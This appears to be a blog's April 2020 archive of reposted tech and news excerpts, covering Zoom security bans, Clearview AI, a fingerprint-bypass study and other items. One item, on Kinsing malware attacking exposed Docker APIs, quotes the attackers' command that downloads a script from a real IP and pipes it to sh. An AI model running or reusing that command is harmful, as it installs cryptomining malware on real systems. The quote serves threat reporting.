The Linkielist

Linking ideas with the world

The Linkielist

Monthly Archives: April 2020

Cannonball Record Broken During Coronavirus – 26 Hours 38 Minutes

Posted on by

Only a few months have passed since we reported that the New York-to-Los Angeles Cannonball record was broken. It’s allegedly been broken again. The 26 hour, 38 minute time—which beats the record set in November by more than 45 minutes—appears to be legitimate, according to Ed Bolian, a Cannonball insider and driver who set his own 28 hour, 50 minute record in 2013. Alex Roy, who set the first modern NYC-to-LA record in 2006, also said the new claim is credible based on his analysis of multiple sources.

“It was not me,” Bolian was quick to point out to Road & Track, eager to quell an Internet-generated rumor that perhaps he had been the one to pull it off.

All we know about this new set of scofflaws is that there were three, maybe four of them, and that they were driving a white 2019 Audi A8 sedan with a pair of red plastic marine fuel tanks ratchet-strapped into its trunk. They started at the Red Ball Garage in New York City at 11:15 pm on April 4, and ended less than 27 hours later at the Portofino Hotel & Marina in Redondo Beach, California, the traditional start and end points of a Cannonball attempt.

We also know that their timing was awful. It doesn’t seem likely that the new record-holders were keen to have news reach the public so soon, especially at a time when so many people are understandably on edge. But an exuberant friend posted a picture of the Audi on Facebook this week—situated among a number of other high-dollar cars, with its trunk open to show the auxiliary fuel tanks—along with the team’s alleged time. Within a day, hundreds of people had shared the post, and social media chat groups were abuzz with Cannonball aficionados offering up opinions on the matter.

Source: Cannonball Record Broken During Coronavirus – 26 Hours 38 Minutes

There’s some whining about it being in poor taste or something. Whatever.

The US Senate reportedly advised members to stop using Zoom

Posted on by

US senators have been advised not to use videoconferencing platform Zoom over security concerns, the Financial Times reports.

According to three people briefed on the matter, the Senate sergeant-at-arms – whose job it is to run law enforcement and security on the Capitol – told senators to find alternative methods for remote working, although he did not implement an outright ban.

With the coronavirus outbreak forcing millions to work from home, Zoom has seen a 1,900% increase in use between December and March to 200 million daily users. This has been accompanied by a string of bad press about its security and privacy practices, to the point where CEO Eric Yuan was forced to publicly apologize last week.

This week the company admitted to “mistakenly” routing data through China in a bid to secure more server space to deal with skyrocketing demand. “We failed to fully implement our usual geo-fencing best practices. As a result, it is possible certain meetings were allowed to connect to systems in China, where they should not have been able to connect,” Yuan said.

The news sparked outrage among some senators, and Senate Democrat Richard Blumenthal called for the FTC to launch an investigation into the company.

“As Zoom becomes embedded in Americans’ daily lives, we urgently need a full & transparent investigation of its privacy and security,” the senator tweeted.

The slew of privacy issues has also prompted the Taiwanese government to ban its officials from using Zoom, and Google banned use of the app on work computers due to its “security vulnerabilities.”

While the Senate has told its members to stay away from Zoom, the Pentagon told the FT that it would continue to allow its staff to use the platform. A memo sent to top cybersecurity officials from the Department of Homeland Security said that the company was being responsive when questioned about concerns over the security of its software, Reuters reported.

Source: The US Senate reportedly advised members to stop using Zoom

Singapore stops teachers using Zoom app after ‘very serious incidents’ (Zoom bombing)

Posted on by

Singapore has suspended the use of video-conferencing tool Zoom by teachers after “very serious incidents” in the first week of a coronavirus lockdown that has seen schools move to home-based learning.

FILE PHOTO: FILE PHOTO: Zoom logo is seen in front of diplayed coronavirus disease (COVID-19) in this illustration taken March 19, 2020. REUTERS/Dado Ruvic/Illustration

One incident involved obscene images appearing on screens and strange men making lewd comments during the streaming of a geography lesson with teenage girls, media said.

Zoom Video Communications Inc (ZM.O) has faced safety and privacy concerns over its conferencing app, use of which has surged in offices and schools worldwide after they shut to try and curb virus infections.

“These are very serious incidents,” Aaron Loh of the education ministry’s technology division said on Friday, without giving details.

“The Ministry of Education (MOE) is currently investigating both breaches and will lodge a police report if warranted.

“As a precautionary measure, our teachers will suspend their use of Zoom until these security issues are ironed out.”

Loh said they ministry would further advise teachers on security protocols, such as requiring secure log-ins and not sharing the meeting link beyond the students in the class.

Source: Singapore stops teachers using Zoom app after ‘very serious incidents’ – Reuters

After 50 Years of Effort, Researchers Made Silicon Emit Light, could improve computer speeds vastly

Posted on by

Modern transistors, which function as a computer’s brain cells, are only a few atoms long. If they are packed too tightly, that can cause all sorts of problems: electron traffic jams, overheating, and strange quantum effects. One solution is to replace some electronic circuits with optical connections that use photons instead of electrons to carry data around a chip. There’s just one problem: Silicon, the main material in computer chips, is terrible at emitting light.

Now, a team of European researchers says they have finally overcome this hurdle. On Wednesday, a research team led by Erik Bakkers, a physicist at Eindhoven University of Technology in the Netherlands, published a paper in Nature that details how they grew silicon alloy nanowires that can emit light. It’s a problem that physicists have grappled with for decades, but Bakkers says his lab is already using the technique to develop a tiny silicon laser that can be built into computer chips. Integrating photonic circuits on conventional electronic chips would enable faster data transfer and lower energy consumption without raising the chip’s temperature, which could make it particularly useful for data-intensive applications like machine learning.

“It’s a big breakthrough that they were able to demonstrate light emission from nanowires made of a silicon mixture, because these materials are compatible with the fabrication processes used in the computer chip industry,” says Pascal Del’Haye, who leads the microphotonics group at the Max Planck Institute for the Science of Light and was not involved in the research. “In the future, this might enable the production of microchips that combine both optical and electronic circuits.”

Source: After 50 Years of Effort, Researchers Made Silicon Emit Light | WIRED

Stanislascollege Pijnacker stopt ook met Zoom door ‘beelden die niet door de beugel kunnen’: porno en Hitler snor tijdens Duits

Posted on by
PIJNACKER – Het Stanislascollege in Pijnacker stopt per direct met het gebruik van de video-app Zoom voor het geven van online lessen. De school heeft meerdere berichten ontvangen van leerlingen, ouders en docenten dat er tijdens de lessen beelden of teksten te zien zijn die niet door de beugel kunnen.

Woensdag besloot het Zoetermeerse Erasmus College ook onmiddellijk te stoppen met Zoom, nadat leerlingen pornobeelden te zien kregen tijdens een online les. Het Stanislascollege heeft zes scholen, verdeeld over Delft, Pijnacker en Rijswijk.

‘In de meeste gevallen lijken de beelden of teksten getoond te worden door personen die niet aan de school verbonden zijn en zich onrechtmatig toegang hebben verschaft tot de les’, schrijft de school in een brief aan ouders.

Hitler-snorretje tijdens les Duits

Volgens regiodirecteur Fons Loogman van Stichting Lucas Onderwijs, waar het Stanislascollege onder valt, zijn er kleine incidenten geweest. ‘Leerlingen sturen een uitnodigingslink door aan derden die dan ook mee kunnen kijken met de les, daar heb je dan geen controle op. Zo is er bijvoorbeeld tijdens een les Duits ergens een Hitlergroet of een Hitler-snorretje getoond.’

Het incident met pornobeelden in Zoetermeer was voor de school in Pijnacker echter de doorslag om te stoppen met Zoom. ‘Daarnaast werden we de afgelopen week al attent gemaakt op berichten uit de ICT-wereld dat Zoom niet veilig is. Zo verzamelen ze informatie, zijn er onveilige beveiligingsstructuren en is het makkelijk te hacken’, zegt Loogman.

Source: Stanislascollege Pijnacker stopt ook met Zoom door ‘beelden die niet door de beugel kunnen’ – Omroep West

Porno tijdens online les van Zoetermeerse school dus stoppen met Zoom

Posted on by
ZOETERMEER – Leerlingen van een klas van het Zoetermeerse Erasmus College hebben woensdagochtend, tijdens een les via de video-app Zoom, pornobeelden te zien gekregen. De school is onmiddellijk gestopt met het gebruik van Zoom.

‘We snappen dat jullie ontzettend geschrokken zijn’, schrijft de school in een mail aan de betreffende leerlingen. ‘We hebben natuurlijk direct alle Zoom-lessen stopgezet en gaan kijken naar een andere methode om thuis les te geven.’

Directeur-bestuurder Roderik Rot bevestigt dat er pornografische beelden te zien zijn geweest en dat om die reden alle lessen zijn gestopt. ‘Ja, er is één klas geweest, waarbij daarvan kort sprake was.’ Om hoeveel leerlingen het gaat kan Rot niet zeggen: ‘Een klas bestaat nooit uit meer dan dertig leerlingen en meestal is het bij die online lessen zo dat niet alle leerlingen erbij zijn.’ Op de vraag om welke les het ging, wil hij uit privacyoverwegingen niet ingaan. De school bood leerlingen aan om indien gewenst contact op te nemen met een hulpteam, maar daarvan is voor zover bekend door niemand gebruik gemaakt.

Gestopt met online lessen

Het Erasmus College is nu dus meteen gestopt met Zoom. Volgens Rot had de school dat al in gang gezet. Een externe privacyadviseur had al gezegd dat Zoom, onder strikte voorwaarden, te gebruiken was, maar dat hij toch andere programma’s adviseerde. ‘Dus we hebben gisteren de ouders allemaal bericht dat we gaan overstappen naar iets anders. En dat we daar druk mee bezig zijn.’

[…]

ID’s onveilig gedeeld

Volgens het Delftse cybersecuritybedrijf Fox-IT is het onwaarschijnlijk dat Zoom zelf is gehackt. Security-expert Sanne Maasakkers: ‘Zoom is een heel groot softwarebedrijf waar iedere dag veel mensen met de beveiliging bezig zijn.’ Volgens Maasakkers is het aannemelijker dat uitnodigingscodes in handen terecht zijn gekomen van mensen die niet op de vergadering zijn uitgenodigd.

Iedere deelnemer krijgt zo’n ID. Als die niet is beveiligd met een wachtwoord, dan kunnen buitenstaanders inbreken in een Zoom-meeting, wat met een wachtwoord veel moeilijker is, tenzij een deelnemer zelf is gehackt.

Source: Porno tijdens online les van Zoetermeerse school: ‘Onwaarschijnlijk dat Zoom is gehackt’ – Omroep West

Nee, het is niet echt ‘gehackt’ in die zin dat het zo’n slechte beveiliging heeft dat je gewoon een  ID in kan voeren en daar lukraak porno naar kan sturen.

Trump signs executive order to support moon mining, tap asteroid resources

Posted on by

The water ice and other lunar resources that will help the United States establish a long-term human presence on the moon are there for the taking, the White House believes.

President Donald Trump signed an executive order today (April 6) establishing U.S. policy on the exploitation of off-Earth resources. That policy stresses that the current regulatory regime — notably, the 1967 Outer Space Treaty — allows the use of such resources.

This view has long held sway in U.S. government circles. For example, the United States, like the other major spacefaring nations, has not signed the 1979 Moon Treaty, which stipulates that non-scientific use of space resources be governed by an international regulatory framework. And in 2015, Congress passed a law explicitly allowing American companies and citizens to use moon and asteroid resources.

The new executive order makes things even more official, stressing that the United States does not view space as a “global commons” and sees a clear path to off-Earth mining, without the need for further international treaty-level agreements.

The executive order, called “Encouraging International Support for the Recovery and Use of Space Resources,” has been in the works for about a year, a senior administration official said during a teleconference with reporters today. The order was prompted, at least in part, by a desire to clarify the United States’ position as it negotiates with international partners to help advance NASA’s Artemis program for crewed lunar exploration, the official added. (Engagement with international partners remains important, the official said.)

Artemis aims to land two astronauts on the moon in 2024 and to establish a sustainable human presence on and around Earth’s nearest neighbor by 2028. Lunar resources, especially the water ice thought to be plentiful on the permanently shadowed floors of polar craters, are key to Artemis’ grand ambitions, NASA officials have said.

The moon is not the final destination for these ambitions, by the way. Artemis is designed to help NASA and its partners learn how to support astronauts in deep space for long stretches, lessons that will be key to putting boots on Mars, which NASA wants to do in the 2030s.

“As America prepares to return humans to the moon and journey on to Mars, this executive order establishes U.S. policy toward the recovery and use of space resources, such as water and certain minerals, in order to encourage the commercial development of space,” Scott Pace, deputy assistant to the president and executive secretary of the U.S. National Space Council, said in a statement today.

President Trump has shown considerable interest in shaping U.S. space policy. In December 2017, for example, he signed Space Policy Directive-1, which laid the groundwork for the Artemis campaign. Two other directives have aimed to streamline commercial space regulation and the protocols for space traffic control. And Space Policy Directive-4, which the president signed in February 2019, called for the creation of the Space Force, the first new U.S. military branch since the Air Force was stood up in 1947.

Source: Trump signs executive order to support moon mining, tap asteroid resources | Space

Attackers can bypass fingerprint authentication with an ~80% success rate

Posted on by

For decades, the use of fingerprints to authenticate users to computers, networks, and restricted areas was (with a few notable exceptions) mostly limited to large and well-resourced organizations that used specialized and expensive equipment. That all changed in 2013 when Apple introduced TouchID. Within a few years, fingerprint-based validation became available to the masses as computer, phone, and lock manufacturers added sensors that gave users an alternative to passwords when unlocking the devices.

Further Reading

Bypassing TouchID was “no challenge at all,” hacker tells Ars

Although hackers managed to defeat TouchID with a fake fingerprint less than 48 hours after the technology was rolled out in the iPhone 5S, fingerprint-based authentication over the past few years has become much harder to defeat. Today, fingerprints are widely accepted as a safe alternative over passwords when unlocking devices in many, but not all, contexts.

A very high probability

A study published on Wednesday by Cisco’s Talos security group makes clear that the alternative isn’t suitable for everyone—namely those who may be targeted by nation-sponsored hackers or other skilled, well-financed, and determined attack groups. The researchers spent about $2,000 over several months testing fingerprint authentication offered by Apple, Microsoft, Samsung, Huawei, and three lock makers. The result: on average, fake fingerprints were able to bypass sensors at least once roughly 80 percent of the time.

The percentages are based on 20 attempts for each device with the best fake fingerprint the researchers were able to create. While Apple Apple products limit users to five attempts before asking for the PIN or password, the researchers subjected the devices to 20 attempts (that is, multiple groups of from one or more attempts). Of the 20 attempts, 17 were successful. Other products tested permitted significantly more or even an unlimited number of unsuccessful tries.

Tuesday’s report was quick to point out that the results required several months of painstaking work, with more than 50 fingerprint molds created before getting one to work. The study also noted that the demands of the attack—which involved obtaining a clean image of a target’s fingerprint and then getting physical access to the target’s device—meant that only the most determined and capable adversaries would succeed.

“Even so, this level of success rate means that we have a very high probability of unlocking any of the tested devices before it falls back into the PIN unlocking,” Talos researchers Paul Rascagneres and Vitor Ventura wrote. “The results show fingerprints are good enough to protect the average person’s privacy if they lose their phone. However, a person that is likely to be targeted by a well-funded and motivated actor should not use fingerprint authentication.”

Source: Attackers can bypass fingerprint authentication with an ~80% success rate | Ars Technica

Google Bans Zoom Videoconferencing Software From Employees’ Computers

Posted on by

Google has banned the popular videoconferencing software Zoom from its employees’ devices, BuzzFeed News has learned. Zoom, a competitor to Google’s own Meet app, has seen an explosion of people using it to work and socialize from home and has become a cultural touchstone during the coronavirus pandemic.

Last week, Google sent an email to employees whose work laptops had the Zoom app installed that cited its “security vulnerabilities” and warned that the videoconferencing software on employee laptops would stop working starting this week.

“We have long had a policy of not allowing employees to use unapproved apps for work that are outside of our corporate network,” Jose Castaneda, a Google spokesperson, told BuzzFeed News. “Recently, our security team informed employees using Zoom Desktop Client that it will no longer run on corporate computers as it does not meet our security standards for apps used by our employees. Employees who have been using Zoom to stay in touch with family and friends can continue to do so through a web browser or via mobile.”

Source: Google Bans Zoom Videoconferencing Software From Employees’ Computers

Germany Flies in Seasonal Farm Workers Amid COVID-19 Efforts – yeah I thought they wanted to keep out the immigrants or something?

Posted on by

Two planeloads of Eastern European farmhands arrived Thursday in Berlin and Duesseldorf amid strict precautions to protect the country from the new coronavirus, as an ambitious German program to import thousands of seasonal agricultural workers got underway.

Seasonal workers had been caught up in the country’s ban on travel after the outbreak of the coronavirus. That left a massive deficit in personnel available to pick asparagus, which has already sprouted, and plant other crops in German fields, where some 300,000 such workers were employed last year.

Most came from Eastern European countries such as Romania, Bulgaria, Ukraine, and Hungary, where wages are much lower than in Germany, which is Europe’s largest economy.

Under the new program, workers need to fly to the country in controlled groups — to prevent the possible infection of others en route — and are subject to medical checks upon arrival. They then must live and work separately from other farmhands for two weeks, and wear protective gear.

Announcing the program, Agriculture Minister Julia Kloecker said it was a “pragmatic and goal-oriented solution” that would allow up to 40,000 seasonal workers into the country in April, and another 40,000 in May. She said the hope was to find an additional 20,000 over the two months among Germany’s own unemployed, students or resident asylum seekers.

“This is important and good news for our farmers,” she said. “Because the harvest doesn’t wait and you can’t delay sowing the fields.”

Ahead of time, interested workers have to register online and have their information checked by federal police. Farmers needing help register online with Eurowings, the airline contracted to bring the workers in, saying when they’re needed and where.

So far, 9,900 people had registered for April and another 4,300 for May.

Flights are then organized to bring in groups, and the first group of workers, 530 people from Romania, arrived on Thursday in Duesseldorf and Berlin, Eurowings said. Further flights were already planned to Duesseldorf, Karlsruhe, Leipzig, Nuremberg and Frankfurt.

Source: Germany Flies in Seasonal Farm Workers Amid COVID-19 Efforts | Time

Rocket Lab proves it can recover a rocket in mid-air by catching it with a helicopter

Posted on by

Last year, Rocket Lab announced that it would attempt to reuse the first stage of its Electron rocket. The company’s goal is to catch the stage as it falls back towards the ocean by plucking it out of mid-air with a helicopter. While that’s ambitious, a video released today shows that Rocket Lab may not be too far off. The clip shows one helicopter dropping an Electron test stage and another hooking the stage’s parachute with a grappling hook and towing it back to land.

Rocket Lab pulled off this stunt in early March. One helicopter dropped the Electron test stage over open ocean in New Zealand. A second helicopter caught it, on the first attempt, at around 5,000 feet.

Next, Rocket Lab will attempt to recover a full Electron first stage following a launch. It won’t pull that from the air but will retrieve the rocket stage after it lands in the ocean. A parachute will help slow its descent, and like previous versions, it will include instrumentation to “inform future recovery efforts.” That mission is planned for late 2020.

Of course, catching a rocket stage after an actual launch is a lot different than catching one that’s dropped neatly by a helicopter. But the feat is a key milestone, as Rocket Lab’s plans to reuse the rockets depend on this recovery method. If it’s successful, Rocket Lab will be able to lower costs, and in theory, that may lead to more launches.

Source: Rocket Lab proves it can recover a rocket in mid-air | Engadget

Easy-to-pick “smart” locks gush personal data, FTC finds

Posted on by

A padlock—whether it uses a combination, a key, or “smart” tech—has exactly one job: to keep your stuff safe so other people can’t get it. Tapplock, Inc., based in Canada, produces such a product. The company’s locks unlock with a fingerprint or an app connected by Bluetooth to your phone. Unfortunately, the Federal Trade Commission said, the locks are full of both digital and physical vulnerabilities that leave users’ stuff, and data, at risk.

The FTC’s complaint (PDF) against Tapplock, released Monday, basically alleges that the company misrepresented itself, because it marketed its products as secure and tested when they were neither. A product—any product—simply being kind of crappy doesn’t necessarily fall under the FTC’s purview. Saying untrue things about your product in your advertisement or privacy policy, however, will make the commission very unhappy with you indeed.

“We allege that Tapplock promised that its Internet-connected locks were secure, but in fact the company failed to even test if that claim was true,” Andrew Smith, director of the FTC’s Bureau of Consumer Protection, said in a written statement. “Tech companies should remember the basics—when you promise security, you need to deliver security.”

Tapplock’s advertisements say its flagship product, the Tapplock One, can store up to 500 user fingerprints and can be connected to an “unlimited” number of devices through the app—a design optimized for something many people need to be able to access and for which handing off a physical key is impractical. To make the $99 lock work, Tapplock collects a great deal of personal information on its users, including usernames, email addresses, profile photos, location history, and the precise location of a user’s lock.

[…]

The lock may be built with “7mm reinforced stainless steel shackles, strengthened by double-layered lock design with anti-shim and anti-pry technologies,” as Tapplock’s website promises, but according to the FTC, perhaps it should have considered anti-screwdriver technologies. As it turns out, a researcher was able to unlock the lock “within a matter of seconds” by unscrewing the back panel. Oops.

The complaint also pointed to several “reasonably foreseeable” software vulnerabilities that the FTC alleges Tapplock could have avoided if the company “had implemented simple, low-cost steps.”

One vulnerability security researchers identified allowed a user to bypass the account authentication process entirely in order to gain full access to the account of literally any Tapplock user, including their personal information. And how could this happen? “A researcher who logged in with a valid user credential could then access another user’s account without being re-directed back to the login page, thereby allowing the researcher to circumvent Respondent’s authentication procedures altogether,” the complaint explains.

A second vulnerability allowed researchers the ability to access and unlock any lock they could get close enough to with a working Bluetooth connection. That’s because Tapplock “failed to encrypt the Bluetooth communication between the lock and the app,” leaving the data wide open for the researchers to discover and replicate.

The third vulnerability outlined in the complaint also has to do with a failure to secure communication data. That app that allows “unlimited” connections? The primary owner can of course add and revoke authorized users from the lock. But someone whose access was revoked could still access the lock because the vulnerability allowed for sniffing out the relevant data packets.

How’d this happen?

And how did Tapplock fail to discover any of these weaknesses? Because the company did not have a security program prior to the third-party researchers’ discoveries, the FTC alleges.

Source: Easy-to-pick “smart” locks gush personal data, FTC finds | Ars Technica

Zoom banned by Taiwan’s government over China security fears

Posted on by

Zoom has been banned from government business in Taiwan in the latest setback for the hugely popular video-calling app.

It follows revelations that some Zoom traffic was “mistakenly” routed through China, which does not recognise Taiwan’s independence.

Taiwan’s government said public bodies should not use products with security concerns “such as Zoom”.

But competitors like Google and Microsoft were acceptable, it said.

China considers Taiwan a breakaway rebel province, destined to be reunited with the mainland.

Last week, researchers discovered that some traffic from the video-calling app was being sent through Beijing – even when all participants on the Zoom call were in North America.

The team from University of Toronto’s Citizen Lab also highlighted that Zoom has several hundred employees in mainland China, which “could also open up Zoom to pressure from Chinese authorities”.

Zoom said the traffic was “mistakenly” routed through Beijing, and apologised.

Despite the response from Zoom, Taiwan has told its public institutions to use other software.

Where possible, domestic solutions should be used, it said, adding that in special circumstances, Google or Microsoft’s apps were acceptable. Those firms operate the Duo and Skype services respectively.

It is the latest blow to Zoom, which has exploded in popularity during the coronavirus pandemic, resulting in increased scrutiny.

Source: Zoom banned by Taiwan’s government over China security fears – BBC News

Creepy Face Recognition Firm Clearview AI Sure Has a Lot of Ties to the Far Right – the extremist kinds of far right

Posted on by

Clearview AI, the dystopian face recognition company that claims to have amassed a database of billions of photos, signed contracts with hundreds of law enforcement agencies, and shopped its app around to the rich and powerful, has extensive links to the far right, according to a Huffington Post investigation. In fact, one of its associates claimed to have been working on a face recognition product explicitly designed to be useful for mass deportations.

Founder Hoan Ton-That’s has links to the far-right movement that move right past suspicious into obvious, according to HuffPo. He reportedly attended a 2016 dinner with white supremacist Richard Spencer and organized by alt-right financier Jeff Giesea, an associate of Palantir founder and Trump-supporting billionaire Peter Thiel. (Thiel secretly bankrolled a lawsuit that bankrupted Gizmodo’s former parent company, Gawker Media.) Ton-That was also a member of a Slack channel run by professional troll Chuck Johnson for his now-defunct WeSearchr, a crowdfunding platform primarily used by white supremacists; that channel included people like the webmaster of neo-Nazi site Daily Stormer, Andrew Auernheimer, and conspiracy theorist Mike Cernovich,

Per HuffPo, in January 2017 Johnson posted on Facebook that he was working on “building algorithms to ID all the illegal immigrants for the deportation squads.” Another source told HuffPo that they had seen him bragging about that work to “a whole bunch of really important people” at Trump’s DC hotel that spring, introducing them to a man the source identified as almost certainly being Ton-That.

Johnson, who was involved with Trump’s transition team, also hit up then-Breitbart employee Katie McHugh, who at that time was a white supremacist but has since left the movement. McHugh told HuffPo that Johnson asked to be put in contact with ghoulish Trump adviser Stephen Miller so he could tout a “way to identify every illegal alien in the country.” (It’s unclear whether that happened, but Clearview’s clients include Immigration and Customs Enforcement and the FBI.) That same year, Thiel invested $200,000 in Clearview.

Smartcheckr’s labor pool also included many ethnonationalists who believe in purging the U.S. of nonwhites, according to HuffPo. One of those was hardcore racist and Johnson associate Tyler Bass, who described himself as an “investigator” doing “remote software testing” for the app and whose LinkedIn posts suggest may have had access to law enforcement data associated with criminal investigations as late as 2018. Bass also claimed to McHugh to have been in attendance at a disastrous far-right rally in Charlottesville, Virginia in 2017, where a neo-Nazi terror attack killed protester Heather Heyer and wounded scores of others.

Another was Douglass Mackey, the overseer of a vast online racist propaganda operation under the moniker “Ricky Vaughn,” had a role as a contract consultant for Smartcheckr. While there, he touted the use of its face recognition tools to anti-Semitic congressional candidate Paul Nehlen for extreme campaign opposition research. (Ton-That told HuffPo that Mackey was only a contractor for three weeks and his offer to Nehlen was unauthorized, though Smartcheckr employees took steps to distance themselves from Mackey after he was outed as “Ricky Vaughn” in 2018.)

There was also Marko Jukic, HuffPo wrote, a Clearview AI employee who marketed its products to police departments and had a history as a prolific contributor to extremist blogs, including a post where he advocated “segregation and separation” of Jews. One of Clearview’s lawyers, Tor Ekeland, is best known for representing far-right provocateurs and racists like Auernheimer.

Johnson appears to have had access to WeSearchr until at least January 2020, when he showed a fellow passenger on a flight to Boston a powerful face recognition app on his phone, according to a BuzzFeed report. In a statement to HuffPo, Ton-That denied that Johnson was an “executive, employee, consultant” or board member of Clearview, though he didn’t clarify whether Johnson holds equity in the company. He also told the site that Clearview has severed ties with Bass and Jukic, claiming he was “shocked by and completely unaware of Marko Jukic’s online writings under a different name.” (Jukic used the same pseudonym to talk with Ton-That on Slack and email that he did in his racist blog posts, HuffPo noted.)

Ton-That also told the site that he grew up on the internet, which “not always served me well” during his upbringing, ad“There was a period when I explored a range of ideas—not out of belief in any of them, but out of a desire to search for self and place in the world. I have finally found it, and the mission to help make America a safer place. To those who have read my words in the Huffington Post article, I deeply apologize for them.”

Clearview built its face recognition database by scraping photos en masse from public social media posts, a practice that is technically legal but could expose it to significant civil liability from rights holders. While scraping is legal, Clearview’s business practices have resulted in cease-and-desists from Silicon Valley giants like Google, and may have run afoul of other laws. The state attorney general of Vermont filed a lawsuit against the company last month alleging violations of the Vermont Consumer Protection Act and a state data broker law, while the AG of New Jersey ordered all police in the state to stop using Clearview products. Canadian privacy commissioners are investigating the company; it is also facing two class action lawsuits, one of which alleges that the company violated Illinois biometrics laws.

Source: Creepy Face Recognition Firm Clearview AI Sure Has a Lot of Ties to the Far Right

If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it

Posted on by

Some Docker installations are getting hammered by malware skiddies hoping to mine digital cash using other people’s CPU time.

Infosec outfit Aqua – no, not the Barbie Girl band – said miscreants have spotted that a decent number of Docker deployments are lazily or inadvertently exposing the daemon API port to the public internet with no protection. It’s a fairly common error that hackers have exploited in the past to mine digital coins, although lately we’re told there have been thousands of infection attempts daily via this interface, all involving a piece of Linux malware dubbed Kinsing.

“These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date,” noted researcher Gal Singer this week.

“We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor.”

If an open system is found, the attacker tells it to create and run a custom Ubuntu container that executes the following command:

/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null

The fetched d.sh script disables SELINUX security protections, as well as searches out and removes any other malware or cryptomining containers already running on the infected machine. That way it won’t have to compete for CPU time. It uses crontab to ensure it stays running every minute, and a bunch of other stuff: it’s 600 lines long.

The script also downloads the Kinsing malware proper, and runs it. This software nasty tries to make contact with one of four command and control servers in Eastern Europe for any special orders to carry out on the infected system. It also runs a script, called spre.sh, that uses any SSH keys it finds to log into and spread to other machines to run its code.

“The spre.sh shell script that the malware downloads is used to laterally spread the malware across the container network,” Aqua’s Singer said.

“In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets.”

Once that is done, the mining component of the malware is finally executed.

Kinsing malware diagram

A diagram of the attack process
click to enlarge

The Register has pinged Docker for comment on the attacks. In the meantime, Singer and Aqua recommend blocking the IP addresses linked to this outbreak. It’s also highly recommended you don’t leave the daemon API port facing the internet, and use policies and configurations to limit what systems are allowed to talk to the interface.

“Identify all cloud resources and group them by some logical structure,” said the team. “Review authorization and authentication policies, basic security policies, and adjust them according to the principle of least privilege. Investigate logs, mostly around user actions, look for actions you can’t account for anomalies.” ®

Source: If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it • The Register

Facebook asks users about coronavirus symptoms, releases friendship data to researchers

Posted on by

Facebook Inc said on Monday it would start surveying some U.S. users about their health as part of a Carnegie Mellon University research project aimed at generating “heat maps” of self-reported coronavirus infections.

The social media giant will display a link at the top of users’ News Feeds directing them to the survey, which the researchers say will help them predict where medical resources are needed. Facebook said it may make surveys available to users in other countries too, if the approach is successful.

Alphabet Inc’s Google, Facebook’s rival in mobile advertising, began querying users for the Carnegie Mellon project last month through its Opinion Rewards app, which exchanges responses to surveys from Google and its clients for app store credit.

Facebook said in a blog post that the Carnegie Mellon researchers “won’t share individual survey responses with Facebook, and Facebook won’t share information about who you are with the researchers.”

The company also said it would begin making new categories of data available to epidemiologists through its Disease Prevention Maps program, which is sharing aggregated location data with partners in 40 countries working on COVID-19 response.

Researchers use the data to provide daily updates on how people are moving around in different areas to authorities in those countries, along with officials in a handful of U.S. cities and states.

In addition to location data, the company will begin making available a “social connectedness index” showing the probability that people in different locations are Facebook friends, aggregated at the zip code level.

Laura McGorman, who runs Facebook’s Data for Good program, said the index could be used to assess the economic impact of the new coronavirus, revealing which communities are most likely to get help from neighboring areas and others that may need more targeted support.

New “co-location maps” can similarly reveal the probability that people in one area will come in contact with people in another, Facebook said.

Source: Facebook asks users about coronavirus symptoms, releases friendship data to researchers – Reuters

This might actually be a good way to use all that privacy invading data

Chinas Winnti group stayed under the radar for a decade by aiming for Linux servers

Posted on by

A group of hackers operating as an offshoot of China’s Winnti group managed to stay undetected for more than a decade by going open source.

A report from BlackBerry outlines how the group, actually a collection of five smaller crews of hackers thought to be state-sponsored, assembled in the wake of Winnti and exploited Linux servers, plus the occasional Windows Server box and mobile device, for years.

“The APT groups examined in this report have traditionally pursued different objectives and focused on a wide array of targets,” BlackBerry noted.

“However, it was observed that there is a significant degree of coordination between these groups, particularly where targeting of Linux platforms is concerned, and it is assessed that any organization with a large Linux distribution should not assume they are outside of the target sets for any of these groups.”

First chronicled by researchers back in 2013, the Winnti hacking operation is thought to date back as far as 2009. These groups, described by BlackBerry as “offshoots” of that hacking outfit, have been around for nearly as long and use similar tactics.

Part of the reason the attack has gone unnoticed for so long, BlackBerry reckons, is due to their preference for Linux servers. It is believed the hackers use three different backdoors, two rootkits, and two other build tools that can be used to construct additional rootkits on a per-target basis for open-source servers.

This in addition to the command-and-control tools and what is described as a “massive botnet” of compromised Linux servers and devices. Some of the malware has been in use dating back to 2012.

Source: Want to stay under the radar for a decade or more? This Chinese hacking crew did it… by aiming for Linux servers • The Register

American schools are banning Zoom and switching to Microsoft Teams

Posted on by

After many schools adopted Zoom to conduct online lessons during the coronavirus lockdown, concerns about security and privacy have led to a ban on the video conferencing software across the US.

The chancellor of New York City’s Department of Education Richard A Carranza sent an email to school principals telling them to “cease using Zoom as soon as possible”. And he is not alone; schools in other parts of the country have taken similar action, and educators are now being trained to use Microsoft Teams as this has been suggested as a suitable alternative, partly because it is compliant with FERPA (Family Educational Rights and Privacy Act).

See also:

Large numbers of teachers spent time learning how to use Zoom to continue educating pupils who are confined to their homes. But growing criticism of Zoom for its approach to privacy and security has given cause for a rethink. Documents seen by Chalkbeat show that principals in NYC have been told: “Based on the DOE’s review of those documented concerns, the DOE will no longer permit the use of Zoom at this time”.

The Washington Post quotes Danielle Filson, spokesperson for the NYC Education Department, as saying:

Providing a safe and secure remote learning experience for our students is essential, and upon further review of security concerns, schools should move away from using Zoom as soon as possible. There are many new components to remote learning, and we are making real-time decisions in the best interest of our staff and student. We will support staff and students in transitioning to different platforms such as Microsoft Teams that have the same capabilities with appropriate security measures in place.

The Post also reports that Clark County Public Schools in Nevada were also moving away from Zoom, saying in a statement that the decision had been taken to ” disable access to Zoom out of an abundance of caution due to instances of hacking that created unsafe environments for teachers and students”.

Schools in Utah, Washington state and beyond are also looking into Zoom alternatives.

Source: American schools are banning Zoom and switching to Microsoft Teams

Dr. Drew Pinsky Played Down COVID-19, Then Tries To DMCA Away The Evidence

Posted on by

